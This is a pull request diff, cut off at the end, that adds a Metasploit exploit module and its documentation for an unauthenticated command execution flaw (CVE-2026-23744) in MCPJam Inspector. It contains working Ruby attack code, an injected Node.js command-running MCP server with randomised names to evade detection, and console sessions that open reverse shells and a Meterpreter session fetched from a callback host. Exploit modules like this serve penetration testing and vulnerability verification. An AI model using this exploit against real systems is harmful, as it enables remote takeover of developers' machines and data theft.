### PR TITLE
Add MCPJam Inspector command execution exploit

### DIFF
--- a/documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md
+++ b/documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md
@@ -1,0 +1,175 @@
+## Vulnerable Application
+
+MCPJam Inspector is a local-first development and debugging tool for Model Context Protocol (MCP) servers.
+Versions 1.4.6 and earlier have been tested as affected by an unauthenticated remote command execution vulnerability in the
+`/api/mcp/connect` endpoint. The endpoint accepts a JSON `serverConfig` object with `command` and `args` fields
+used to launch an MCP server. When MCPJam Inspector is exposed on a routable interface, a remote attacker can
+supply an arbitrary command and execute code as the user running MCPJam Inspector.
+
+The GitHub Security Advisory for CVE-2026-23744 states that affected versions are `<= 1.4.2`; however, local
+testing of GitHub tags through `v1.4.6` also confirmed command execution through this module. Local testing found
+that `v1.5.0` requires a session token for the connect endpoint and is not vulnerable to this unauthenticated
+exploit path. This module currently provides a Unix command target only.
+
+## Testing
+
+### Setup a vulnerable MCPJam Inspector instance
+
+Install Node.js and run the vulnerable npm package. MCPJam Inspector 1.4.2 binds the server to all interfaces
+and uses port 6274 by default. The `SERVER_PORT` environment variable can be used to select a different port.
+
+```
+SERVER_PORT=6274 npx @mcpjam/inspector@1.4.2
+```
+
+To build from source instead, check out a vulnerable GitHub tag and run the production build:
+
+```
+git clone https://github.com/MCPJam/inspector.git
+cd inspector
+git checkout v1.4.2
+npm run install:deps
+npm run build
+SERVER_PORT=6274 node bin/start.js
+```
+
+Verify that the service is reachable:
+
+```
+curl http://192.0.2.10:6274/
+curl -i -X POST http://192.0.2.10:6274/api/mcp/connect \
+  -H 'Content-Type: application/json' \
+  -d '{"serverId":"test"}'
+```
+
+A vulnerable service should return an MCPJam Inspector web UI on `/`. The incomplete `/api/mcp/connect` request
+should return an error indicating that `serverConfig` is required.
+
+## Verification Steps
+
+1. Start `msfconsole`.
+2. Run: `use exploit/multi/http/mcpjam_inspector_rce`.
+3. Set `RHOSTS`, `RPORT`, `SSL`, and `TARGETURI` as needed.
+4. Run `check`.
+5. For command-output testing, set `PAYLOAD` to `cmd/unix/generic`, set `FETCH_OUTPUT` to `true`, and set `CMD`.
+6. For a session, set a Unix command shell payload such as `cmd/unix/reverse_bash` or `cmd/unix/reverse_nodejs`.
+7. Run the module.
+
+## Options
+
+### FETCH_OUTPUT
+
+When set to `true`, the module waits for the MCP tool command to finish and prints stdout/stderr from the MCP
+response. This is useful with `cmd/unix/generic` and short diagnostic commands such as `id` or `uname -a`.
+
+For reverse shell or other long-running session payloads, keep `FETCH_OUTPUT` set to `false` so the payload is
+spawned asynchronously and the MCP tool call returns immediately.
+
+### EXEC_METHOD
+
+The default `mcp_tool` method starts a transient Node.js stdio MCP server and executes the Metasploit payload
+through the MCP tool API. This is the most reliable method because it satisfies the MCP handshake expected by
+MCPJam Inspector.
+
+The `direct_sh` method sends `/bin/sh -c <payload>` directly through `/api/mcp/connect`. It is useful for quick
+manual testing but non-MCP payloads may cause the target to return an MCP connection error after command dispatch.
+
+### SERVER_ID
+
+Optional MCP server ID to use for the transient MCP connection. If unset, the module generates a random server ID.
+
+## Scenarios
+
+### MCPJam Inspector 1.4.2 on Linux - check and command output
+
+```
+msf6 > use exploit/multi/http/mcpjam_inspector_rce
+[*] No payload configured, defaulting to cmd/unix/reverse_netcat
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set RHOSTS 192.0.2.10
+RHOSTS => 192.0.2.10
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set RPORT 6274
+RPORT => 6274
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set SSL false
+SSL => false
+msf6 exploit(multi/http/mcpjam_inspector_rce) > check
+[*] Starting transient Node.js MCP command server as server ID check-abc12345
+[+] 192.0.2.10:6274 - The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set PAYLOAD cmd/unix/generic
+PAYLOAD => cmd/unix/generic
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_OUTPUT true
+FETCH_OUTPUT => true
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set CMD id
+CMD => id
+msf6 exploit(multi/http/mcpjam_inspector_rce) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Starting transient Node.js MCP command server as server ID check-def67890
+[+] The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
+[*] Starting transient Node.js MCP command server as server ID msf-xyz12345
+[+] MCP command server connected
+[*] Executing payload through MCP tools/execute
+[*] Command result: uid=1000(node) gid=1000(node) groups=1000(node)
+[*] Exploit completed, but no session was created.
+```
+
+The final `Exploit completed, but no session was created` message is expected for `cmd/unix/generic` because it
+executes a command and does not create a Metasploit session.
+
+### MCPJam Inspector 1.4.2 on Linux - Unix reverse shell
+
+```
+msf6 > use exploit/multi/http/mcpjam_inspector_rce
+[*] No payload configured, defaulting to cmd/unix/reverse_netcat
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set RHOSTS 192.0.2.10
+RHOSTS => 192.0.2.10
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set RPORT 6274
+RPORT => 6274
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set SSL false
+SSL => false
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set PAYLOAD cmd/unix/reverse_nodejs
+PAYLOAD => cmd/unix/reverse_nodejs
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set LHOST 192.0.2.20
+LHOST => 192.0.2.20
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set LPORT 9001
+LPORT => 9001
+msf6 exploit(multi/http/mcpjam_inspector_rce) > run
+
+[*] Started reverse TCP handler on 192.0.2.20:9001
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Starting transient Node.js MCP command server as server ID check-ghijk123
+[+] The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
+[*] Starting transient Node.js MCP command server as server ID msf-lmnop456
+[+] MCP command server connected
+[*] Executing payload through MCP tools/execute
+[*] Command shell session 1 opened (192.0.2.20:9001 -> 192.0.2.10:51234) at 2026-01-17 12:00:00 +0000
+
+id
+uid=1000(node) gid=1000(node) groups=1000(node)
+```
+
+## Tested Payloads
+
+The following Unix command payloads were tested successfully against Linux MCPJam Inspector deployments:
+
+* `cmd/unix/generic`
+* `cmd/unix/reverse_bash`
+* `cmd/unix/reverse_nodejs`
+* `cmd/unix/reverse_perl`
+* `cmd/unix/reverse_python`
+* `cmd/unix/reverse_netcat`
+* `cmd/unix/bind_nodejs`
+* `cmd/unix/python/pingback_reverse_tcp`
+* `cmd/unix/python/shell_reverse_tcp`
+
+Other `cmd/unix` payloads may also work if the required interpreter or utility is present on the target and the
+network path is permitted.
+
+## Tested Versions
+
+The module was tested successfully against MCPJam Inspector `v1.4.1`, `v1.4.2`, `v1.4.3`, `v1.4.4`, `v1.4.5`,
+and `v1.4.6` built from the GitHub source repository. The first fixed GitHub tag identified during testing was
+`v1.5.0`; the `v2.23.0` tag also required session-token authentication for the relevant API endpoints. The module
+was also tested against two Linux lab deployments exposing MCPJam Inspector over HTTP/HTTPS.
+
+When the check method receives an authentication response such as `Unauthorized` or `Session token required` from
+the connect endpoint, it reports the target as not exploitable by this unauthenticated module.

--- a/documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md
+++ b/documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md
@@ -15,8 +15,22 @@ exploit path. This module currently provides a Unix command target only.
 
 ### Setup a vulnerable MCPJam Inspector instance
 
-Install Node.js and run the vulnerable npm package. MCPJam Inspector 1.4.2 binds the server to all interfaces
-and uses port 6274 by default. The `SERVER_PORT` environment variable can be used to select a different port.
+The official MCPJam Inspector 1.4.2 container provides a reproducible test target. The application runs as the
+unprivileged `node` user and listens on port 6274. The following command binds the vulnerable service to the local
+host only:
+
+```
+docker run --rm -d --name mcpjam-v142 \
+  -p 127.0.0.1:6274:6274 \
+  mcpjam/mcp-inspector:v1.4.2
+```
+
+Use an isolated test network and replace the loopback bind with an authorized lab interface only when testing from
+a separate Metasploit host. Do not expose this intentionally vulnerable container to an untrusted network.
+
+Alternatively, install Node.js and run the vulnerable npm package. MCPJam Inspector 1.4.2 binds the server to all
+interfaces and uses port 6274 by default. The `SERVER_PORT` environment variable can be used to select a different
+port.
 
 ```
 SERVER_PORT=6274 npx @mcpjam/inspector@1.4.2
@@ -52,7 +66,8 @@ should return an error indicating that `serverConfig` is required.
 3. Set `RHOSTS`, `RPORT`, `SSL`, and `TARGETURI` as needed.
 4. Run `check`.
 5. For command-output testing, set `PAYLOAD` to `cmd/unix/generic`, set `FETCH_OUTPUT` to `true`, and set `CMD`.
-6. For a session, set a Unix command shell payload such as `cmd/unix/reverse_bash` or `cmd/unix/reverse_nodejs`.
+6. For a session, set a Unix command shell payload such as `cmd/unix/reverse_bash`, or a Linux command fetch payload
+   such as `cmd/linux/http/x64/meterpreter_reverse_tcp`.
 7. Run the module.
 
 ## Options
@@ -76,7 +91,7 @@ manual testing but non-MCP payloads may cause the target to return an MCP connec
 
 ### SERVER_ID
 
-Optional MCP server ID to use for the transient MCP connection. If unset, the module generates a random server ID.
+MCP server ID to use for the transient MCP connection. The module generates a random default when it is loaded.
 
 ## Scenarios
 
@@ -147,6 +162,51 @@ id
 uid=1000(node) gid=1000(node) groups=1000(node)
 ```
 
+### MCPJam Inspector 1.4.2 Docker container - Linux x64 Meterpreter
+
+The official container includes `wget` and provides a writable `/tmp` directory. Set the fetch host and callback
+host to an address reachable from the container:
+
+```
+msf6 > use exploit/multi/http/mcpjam_inspector_rce
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set RHOSTS 192.0.2.10
+RHOSTS => 192.0.2.10
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set RPORT 6274
+RPORT => 6274
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set SSL false
+SSL => false
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_COMMAND WGET
+FETCH_COMMAND => WGET
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_WRITABLE_DIR /tmp
+FETCH_WRITABLE_DIR => /tmp
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_DELETE true
+FETCH_DELETE => true
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_SRVHOST 192.0.2.20
+FETCH_SRVHOST => 192.0.2.20
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set LHOST 192.0.2.20
+LHOST => 192.0.2.20
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set LPORT 9001
+LPORT => 9001
+msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_OUTPUT false
+FETCH_OUTPUT => false
+msf6 exploit(multi/http/mcpjam_inspector_rce) > run
+
+[*] Started reverse TCP handler on 192.0.2.20:9001
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
+[+] MCP command server connected
+[*] Executing payload through MCP tools/execute
+[*] Meterpreter session 1 opened (192.0.2.20:9001 -> 192.0.2.10:51234)
+
+meterpreter > getuid
+Server username: node
+meterpreter > sysinfo
+Architecture : x64
+Meterpreter  : x64/linux
+```
+
 ## Tested Payloads
 
 The following Unix command payloads were tested successfully against Linux MCPJam Inspector deployments:
@@ -160,6 +220,7 @@ The following Unix command payloads were tested successfully against Linux MCPJa
 * `cmd/unix/bind_nodejs`
 * `cmd/unix/python/pingback_reverse_tcp`
 * `cmd/unix/python/shell_reverse_tcp`
+* `cmd/linux/http/x64/meterpreter_reverse_tcp`
 
 Other `cmd/unix` payloads may also work if the required interpreter or utility is present on the target and the
 network path is permitted.
@@ -169,7 +230,8 @@ network path is permitted.
 The module was tested successfully against MCPJam Inspector `v1.4.1`, `v1.4.2`, `v1.4.3`, `v1.4.4`, `v1.4.5`,
 and `v1.4.6` built from the GitHub source repository. The first fixed GitHub tag identified during testing was
 `v1.5.0`; the `v2.23.0` tag also required session-token authentication for the relevant API endpoints. The module
-was also tested against two Linux lab deployments exposing MCPJam Inspector over HTTP/HTTPS.
+was also tested against the official `mcpjam/mcp-inspector:v1.4.2` Linux x64 container and two Linux lab deployments
+exposing MCPJam Inspector over HTTP/HTTPS.
 
 When the check method receives an authentication response such as `Unauthorized` or `Session token required` from
 the connect endpoint, it reports the target as not exploitable by this unauthenticated module.

--- a/modules/exploits/multi/http/mcpjam_inspector_rce.rb
+++ b/modules/exploits/multi/http/mcpjam_inspector_rce.rb
@@ -1,0 +1,332 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'MCPJam Inspector Connect API Command Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated command execution vulnerability in
+          MCPJam Inspector. The /api/mcp/connect endpoint accepts a JSON serverConfig
+          object containing a command and argument list used to start an MCP server.
+          A remote attacker can abuse this endpoint to execute arbitrary operating
+          system commands as the user running MCPJam Inspector.
+
+          By default, this module starts a transient Node.js stdio MCP server, then
+          invokes a tool that executes the Metasploit command payload. A direct
+          /bin/sh -c mode is also available via EXEC_METHOD=direct_sh, but the MCP
+          tool mode is more reliable when the inspector expects a valid MCP
+          handshake.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'earthenvessel' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2026-23744'],
+          ['URL', 'https://github.com/mcpjam/inspector'],
+          ['URL', 'https://packetinside.github.io/cves/cve-2026-23744/']
+        ],
+        'DisclosureDate' => '2026-01-16',
+        'Payload' => {
+          'Space' => 8192,
+          'DisableNops' => true,
+          'Compat' => {
+            'PayloadType' => 'cmd'
+          }
+        },
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path for MCPJam Inspector', '/']),
+        OptString.new('SERVER_ID', [false, 'Server ID to use for the transient MCP connection']),
+        OptEnum.new('EXEC_METHOD', [true, 'Command dispatch method', 'mcp_tool', ['mcp_tool', 'direct_sh']]),
+        OptBool.new('FETCH_OUTPUT', [true, 'Fetch command output from the MCP tool response', false])
+      ]
+    )
+  end
+
+  def base_path
+    normalize_uri(target_uri.path)
+  end
+
+  def connect_path
+    normalize_uri(base_path, 'api', 'mcp', 'connect')
+  end
+
+  def tools_execute_path
+    normalize_uri(base_path, 'api', 'mcp', 'tools', 'execute')
+  end
+
+  def delete_server_path(id)
+    normalize_uri(base_path, 'api', 'mcp', 'servers', id)
+  end
+
+  def random_server_id(prefix = 'msf')
+    "#{prefix}-#{Rex::Text.rand_text_alphanumeric(8)}"
+  end
+
+  def server_id
+    configured_id = datastore['SERVER_ID'].to_s
+    return random_server_id if configured_id.empty?
+
+    configured_id
+  end
+
+  def post_connect(config, id:, timeout: 20)
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => connect_path,
+        'ctype' => 'application/json',
+        'data' => {
+          'serverId' => id,
+          'serverConfig' => config
+        }.to_json
+      },
+      timeout
+    )
+  end
+
+  def mcp_tool_payload(fetch_output: false)
+    fetch_output_literal = fetch_output ? 'true' : 'false'
+
+    %{
+const rl=require('readline').createInterface({input:process.stdin});
+const fetchDefault=#{fetch_output_literal};
+function send(o){process.stdout.write(JSON.stringify(o)+'\\n')}
+rl.on('line',function(l){
+  let m; try{m=JSON.parse(l)}catch(e){return}
+  if(m.method==='initialize'){
+    send({jsonrpc:'2.0',id:m.id,result:{protocolVersion:'2024-11-05',capabilities:{tools:{}},serverInfo:{name:'svc',version:'1.0.0'}}});
+  } else if(m.method==='notifications/initialized'){
+  } else if(m.method==='tools/list'){
+    send({jsonrpc:'2.0',id:m.id,result:{tools:[{name:'exec',description:'run command',inputSchema:{type:'object',properties:{cmd:{type:'string'},fetch_output:{type:'boolean'}},required:['cmd']}}]}});
+  } else if(m.method==='tools/call'){
+    const cp=require('child_process');
+    const args=(m.params&&m.params.arguments)||{};
+    const cmd=args.cmd||'id';
+    const fetchOutput=args.fetch_output===undefined?fetchDefault:!!args.fetch_output;
+    if(fetchOutput){
+      cp.exec(cmd,{timeout:30000},function(err,stdout,stderr){
+        send({jsonrpc:'2.0',id:m.id,result:{content:[{type:'text',text:(stdout||'')+(stderr||'')+(err?String(err):'')}],isError:!!err}});
+      });
+    } else {
+      const child=cp.spawn('/bin/sh',['-c',cmd],{detached:true,stdio:'ignore'});
+      child.unref();
+      send({jsonrpc:'2.0',id:m.id,result:{content:[{type:'text',text:'Command dispatched'}],isError:false}});
+    }
+  } else if(m.id!==undefined){
+    send({jsonrpc:'2.0',id:m.id,result:{}});
+  }
+});
+    }.strip
+  end
+
+  def start_mcp_tool_server(id, fetch_output: datastore['FETCH_OUTPUT'])
+    print_status("Starting transient Node.js MCP command server as server ID #{id}")
+
+    post_connect(
+      {
+        'command' => 'node',
+        'args' => ['-e', mcp_tool_payload(fetch_output: fetch_output)]
+      },
+      id: id,
+      timeout: 20
+    )
+  end
+
+  def execute_mcp_tool(id, cmd, fetch_output: datastore['FETCH_OUTPUT'])
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => tools_execute_path,
+        'ctype' => 'application/json',
+        'data' => {
+          'serverId' => id,
+          'toolName' => 'exec',
+          'parameters' => {
+            'cmd' => cmd,
+            'fetch_output' => fetch_output
+          }
+        }.to_json
+      },
+      35
+    )
+  end
+
+  def cleanup_mcp_server(id)
+    send_request_cgi('method' => 'DELETE', 'uri' => delete_server_path(id)) if id
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => base_path
+    )
+
+    return CheckCode::Unknown('No response from the target') unless res
+
+    unless res.code == 200 && res.body&.include?('MCPJam Inspector')
+      return CheckCode::Safe('The target does not appear to be MCPJam Inspector')
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => connect_path,
+      'ctype' => 'application/json',
+      'data' => { 'serverId' => random_server_id('check') }.to_json
+    )
+
+    return CheckCode::Detected('MCPJam Inspector was detected, but the connect endpoint could not be verified') unless res
+
+    json = res.get_json_document
+    auth_text = [
+      json['error'],
+      json['message'],
+      json['hint']
+    ].compact.join(' ')
+    if [401, 403].include?(res.code) && auth_text.match?(/unauthorized|session token|required|X-MCP-Session-Auth/i)
+      return CheckCode::Safe('MCPJam Inspector requires session-token authentication for the connect endpoint')
+    end
+
+    unless res.code == 400 && json['error'].to_s.include?('serverConfig is required')
+      return CheckCode::Detected('MCPJam Inspector was detected, but the connect endpoint response was unexpected')
+    end
+
+    id = random_server_id('check')
+    marker = Rex::Text.rand_text_alphanumeric(12)
+    res = start_mcp_tool_server(id, fetch_output: true)
+    unless res&.code == 200
+      return CheckCode::Detected('MCPJam Inspector connect endpoint is reachable, but command execution could not be confirmed')
+    end
+
+    res = execute_mcp_tool(id, "printf #{marker}", fetch_output: true)
+    return CheckCode::Detected('MCPJam Inspector command execution could not be confirmed') unless res&.code == 200
+
+    output = res.get_json_document.dig('result', 'content', 0, 'text').to_s
+    if output.include?(marker)
+      return CheckCode::Vulnerable('MCPJam Inspector executed a benign command through the unauthenticated connect endpoint')
+    end
+
+    CheckCode::Detected('MCPJam Inspector command execution response did not contain the expected marker')
+  rescue JSON::ParserError
+    CheckCode::Detected('MCPJam Inspector was detected, but an endpoint returned invalid JSON')
+  rescue StandardError => e
+    CheckCode::Unknown("Unable to complete check: #{e.class}: #{e.message}")
+  ensure
+    cleanup_mcp_server(id) if id
+  end
+
+  def execute_direct_sh(cmd, id)
+    print_status("Sending direct /bin/sh command via MCPJam connect endpoint as server ID #{id}")
+
+    res = post_connect(
+      {
+        'command' => '/bin/sh',
+        'args' => ['-c', cmd]
+      },
+      id: id,
+      timeout: 20
+    )
+
+    if res.nil?
+      print_status('No HTTP response received after command dispatch')
+      return
+    end
+
+    case res.code
+    when 200
+      print_good('Command dispatched and the target returned success')
+    when 500
+      print_status("Command dispatched; target returned #{res.code} #{res.message}, which is expected for non-MCP payloads")
+    else
+      print_warning("Unexpected response after command dispatch: HTTP #{res.code} #{res.message}")
+      vprint_line(res.body.to_s)
+    end
+  end
+
+  def execute_via_mcp_tool(cmd, id)
+    res = start_mcp_tool_server(id)
+
+    fail_with(Failure::Unreachable, 'No HTTP response received while starting MCP command server') unless res
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Failed to start MCP command server: HTTP #{res.code} #{res.message} #{res.body}")
+    end
+
+    print_good('MCP command server connected')
+    print_status('Executing payload through MCP tools/execute')
+
+    res = execute_mcp_tool(id, cmd)
+
+    if res.nil?
+      print_status('No HTTP response received after tool execution')
+      return
+    end
+
+    unless res.code == 200
+      print_warning("Unexpected tools/execute response: HTTP #{res.code} #{res.message}")
+      vprint_line(res.body.to_s)
+      return
+    end
+
+    result = res.get_json_document
+    text = result.dig('result', 'content', 0, 'text').to_s
+    if datastore['FETCH_OUTPUT']
+      print_status("Command result: #{text.strip}") unless text.empty?
+    else
+      vprint_status("MCP tool response: #{text.strip}") unless text.empty?
+    end
+  rescue JSON::ParserError
+    print_warning('Tools/execute returned non-JSON output')
+  ensure
+    cleanup_mcp_server(id)
+  end
+
+  def execute_command(cmd, _opts = {})
+    id = server_id
+
+    if datastore['EXEC_METHOD'] == 'direct_sh'
+      execute_direct_sh(cmd, id)
+    else
+      execute_via_mcp_tool(cmd, id)
+    end
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+end

--- a/modules/exploits/multi/http/mcpjam_inspector_rce.rb
+++ b/modules/exploits/multi/http/mcpjam_inspector_rce.rb
@@ -41,18 +41,18 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2026-01-16',
         'Payload' => {
           'Space' => 8192,
-          'DisableNops' => true,
-          'Compat' => {
-            'PayloadType' => 'cmd'
-          }
+          'DisableNops' => true
         },
         'Privileged' => false,
         'Targets' => [
           [
-            'Unix Command',
+            'Unix/Linux Command',
             {
-              'Platform' => 'unix',
-              'Arch' => ARCH_CMD
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'FETCH_COMMAND' => 'WGET'
+              }
             }
           ]
         ],
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Base path for MCPJam Inspector', '/']),
-        OptString.new('SERVER_ID', [false, 'Server ID to use for the transient MCP connection']),
+        OptString.new('SERVER_ID', [true, 'Server ID to use for the transient MCP connection', random_server_id]),
         OptEnum.new('EXEC_METHOD', [true, 'Command dispatch method', 'mcp_tool', ['mcp_tool', 'direct_sh']]),
         OptBool.new('FETCH_OUTPUT', [true, 'Fetch command output from the MCP tool response', false])
       ]
@@ -97,13 +97,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def random_server_id(prefix = 'msf')
     "#{prefix}-#{Rex::Text.rand_text_alphanumeric(8)}"
-  end
-
-  def server_id
-    configured_id = datastore['SERVER_ID'].to_s
-    return random_server_id if configured_id.empty?
-
-    configured_id
   end
 
   def post_connect(config, id:, timeout: 20)
@@ -317,7 +310,7 @@ rl.on('line',function(l){
   end
 
   def execute_command(cmd, _opts = {})
-    id = server_id
+    id = datastore['SERVER_ID']
 
     if datastore['EXEC_METHOD'] == 'direct_sh'
       execute_direct_sh(cmd, id)

--- a/modules/exploits/multi/http/mcpjam_inspector_rce.rb
+++ b/modules/exploits/multi/http/mcpjam_inspector_rce.rb
@@ -31,6 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
+          'Louay-075', # PoC author
           'earthenvessel' # Metasploit module
         ],
         'References' => [
@@ -99,6 +100,20 @@ class MetasploitModule < Msf::Exploit::Remote
     "#{prefix}-#{Rex::Text.rand_text_alphanumeric(8)}"
   end
 
+  def mcp_tool_names
+    names = {}
+    %i[
+      readline fetch_default send_response response line message error child_process arguments command fetch_output
+      exec_error stdout stderr child tool_name command_key fetch_output_key
+    ].each do |name|
+      random_name = "_#{Rex::Text.rand_text_alpha_lower(8)}"
+      random_name = "_#{Rex::Text.rand_text_alpha_lower(8)}" while names.value?(random_name)
+      names[name] = random_name
+    end
+
+    names
+  end
+
   def post_connect(config, id:, timeout: 20)
     send_request_cgi(
       {
@@ -114,55 +129,55 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def mcp_tool_payload(fetch_output: false)
+  def mcp_tool_payload(names, fetch_output: false)
     fetch_output_literal = fetch_output ? 'true' : 'false'
 
     %{
-const rl=require('readline').createInterface({input:process.stdin});
-const fetchDefault=#{fetch_output_literal};
-function send(o){process.stdout.write(JSON.stringify(o)+'\\n')}
-rl.on('line',function(l){
-  let m; try{m=JSON.parse(l)}catch(e){return}
-  if(m.method==='initialize'){
-    send({jsonrpc:'2.0',id:m.id,result:{protocolVersion:'2024-11-05',capabilities:{tools:{}},serverInfo:{name:'svc',version:'1.0.0'}}});
-  } else if(m.method==='notifications/initialized'){
-  } else if(m.method==='tools/list'){
-    send({jsonrpc:'2.0',id:m.id,result:{tools:[{name:'exec',description:'run command',inputSchema:{type:'object',properties:{cmd:{type:'string'},fetch_output:{type:'boolean'}},required:['cmd']}}]}});
-  } else if(m.method==='tools/call'){
-    const cp=require('child_process');
-    const args=(m.params&&m.params.arguments)||{};
-    const cmd=args.cmd||'id';
-    const fetchOutput=args.fetch_output===undefined?fetchDefault:!!args.fetch_output;
-    if(fetchOutput){
-      cp.exec(cmd,{timeout:30000},function(err,stdout,stderr){
-        send({jsonrpc:'2.0',id:m.id,result:{content:[{type:'text',text:(stdout||'')+(stderr||'')+(err?String(err):'')}],isError:!!err}});
+const #{names[:readline]}=require('readline').createInterface({input:process.stdin});
+const #{names[:fetch_default]}=#{fetch_output_literal};
+function #{names[:send_response]}(#{names[:response]}){process.stdout.write(JSON.stringify(#{names[:response]})+'\\n')}
+#{names[:readline]}.on('line',function(#{names[:line]}){
+  let #{names[:message]}; try{#{names[:message]}=JSON.parse(#{names[:line]})}catch(#{names[:error]}){return}
+  if(#{names[:message]}.method==='initialize'){
+    #{names[:send_response]}({jsonrpc:'2.0',id:#{names[:message]}.id,result:{protocolVersion:'2024-11-05',capabilities:{tools:{}},serverInfo:{name:'svc',version:'1.0.0'}}});
+  } else if(#{names[:message]}.method==='notifications/initialized'){
+  } else if(#{names[:message]}.method==='tools/list'){
+    #{names[:send_response]}({jsonrpc:'2.0',id:#{names[:message]}.id,result:{tools:[{name:'#{names[:tool_name]}',description:'run command',inputSchema:{type:'object',properties:{#{names[:command_key]}:{type:'string'},#{names[:fetch_output_key]}:{type:'boolean'}},required:['#{names[:command_key]}']}}]}});
+  } else if(#{names[:message]}.method==='tools/call'){
+    const #{names[:child_process]}=require('child_process');
+    const #{names[:arguments]}=(#{names[:message]}.params&&#{names[:message]}.params.arguments)||{};
+    const #{names[:command]}=#{names[:arguments]}['#{names[:command_key]}']||'id';
+    const #{names[:fetch_output]}=#{names[:arguments]}['#{names[:fetch_output_key]}']===undefined?#{names[:fetch_default]}:!!#{names[:arguments]}['#{names[:fetch_output_key]}'];
+    if(#{names[:fetch_output]}){
+      #{names[:child_process]}.exec(#{names[:command]},{timeout:30000},function(#{names[:exec_error]},#{names[:stdout]},#{names[:stderr]}){
+        #{names[:send_response]}({jsonrpc:'2.0',id:#{names[:message]}.id,result:{content:[{type:'text',text:(#{names[:stdout]}||'')+(#{names[:stderr]}||'')+(#{names[:exec_error]}?String(#{names[:exec_error]}):'')}],isError:!!#{names[:exec_error]}}});
       });
     } else {
-      const child=cp.spawn('/bin/sh',['-c',cmd],{detached:true,stdio:'ignore'});
-      child.unref();
-      send({jsonrpc:'2.0',id:m.id,result:{content:[{type:'text',text:'Command dispatched'}],isError:false}});
+      const #{names[:child]}=#{names[:child_process]}.spawn('/bin/sh',['-c',#{names[:command]}],{detached:true,stdio:'ignore'});
+      #{names[:child]}.unref();
+      #{names[:send_response]}({jsonrpc:'2.0',id:#{names[:message]}.id,result:{content:[{type:'text',text:'Command dispatched'}],isError:false}});
     }
-  } else if(m.id!==undefined){
-    send({jsonrpc:'2.0',id:m.id,result:{}});
+  } else if(#{names[:message]}.id!==undefined){
+    #{names[:send_response]}({jsonrpc:'2.0',id:#{names[:message]}.id,result:{}});
   }
 });
     }.strip
   end
 
-  def start_mcp_tool_server(id, fetch_output: datastore['FETCH_OUTPUT'])
+  def start_mcp_tool_server(id, names, fetch_output: datastore['FETCH_OUTPUT'])
     print_status("Starting transient Node.js MCP command server as server ID #{id}")
 
     post_connect(
       {
         'command' => 'node',
-        'args' => ['-e', mcp_tool_payload(fetch_output: fetch_output)]
+        'args' => ['-e', mcp_tool_payload(names, fetch_output: fetch_output)]
       },
       id: id,
       timeout: 20
     )
   end
 
-  def execute_mcp_tool(id, cmd, fetch_output: datastore['FETCH_OUTPUT'])
